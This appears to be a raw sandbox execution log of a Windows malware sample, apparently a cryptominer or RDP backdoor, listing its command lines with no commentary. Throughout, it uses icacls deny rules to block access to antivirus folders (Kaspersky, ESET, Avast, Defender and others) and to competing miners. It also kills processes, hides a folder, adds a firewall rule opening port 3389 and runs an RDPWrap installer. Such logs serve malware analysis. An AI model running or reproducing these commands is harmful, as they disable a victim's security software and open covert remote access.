C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Package Cache" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\GOOGLE /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\hhsm /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\hhsm /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\Cefunpacked /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\windowsnode /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\hhsm /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\GOOGLE /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\hhsm /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\Cefunpacked /deny Admin:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\prefssecure /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\MicrosoftCorporation /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\tiser /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls D:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls E:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\prefssecure /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\MicrosoftCorporation /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\tiser /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls E:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls D:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls K:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\disk /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Logs /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\min /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls K:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\hs_module /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\oracle /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\WindowsSQL /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\disk /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Logs /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\windows\min /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\oracle /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\hs_module /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\WindowsSQL /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\DirectX11b /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Framework /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\system32 /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\AudioHDriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\DirectX11b /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Framework /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\windowsdriver /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\WindowsDefender /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\DriversI /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\hs /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\system32 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\rss /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\AudioHDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\windowsdriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\WindowsDefender /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\DriversI /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\hs /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\rss /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\generictools /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\PCBooster /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\unityp /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\AMD /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\generictools /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\PCBooster /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\unityp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\AMD /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xmarin /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\comdev /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wupdate /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\monotype /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xpon /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\xmarin /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\comdev /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\wupdate /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\monotype /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\xpon /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wmipr /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\kara /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\syslog /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\temp\wup /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\wmipr /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\kara /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\syslog /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\temp\wup /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\geckof /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\initwin /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\packagest /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\geckof /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\initwin /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Local\packagest /deny Admin:(OI)(CI)(F)
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\subdir /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\syscore /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\windowscore /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\subdir /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kryptex /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\syscore /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\windowscore /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\kryptex /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\system /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\system /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\gplyra /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\intel /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\gplyra /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
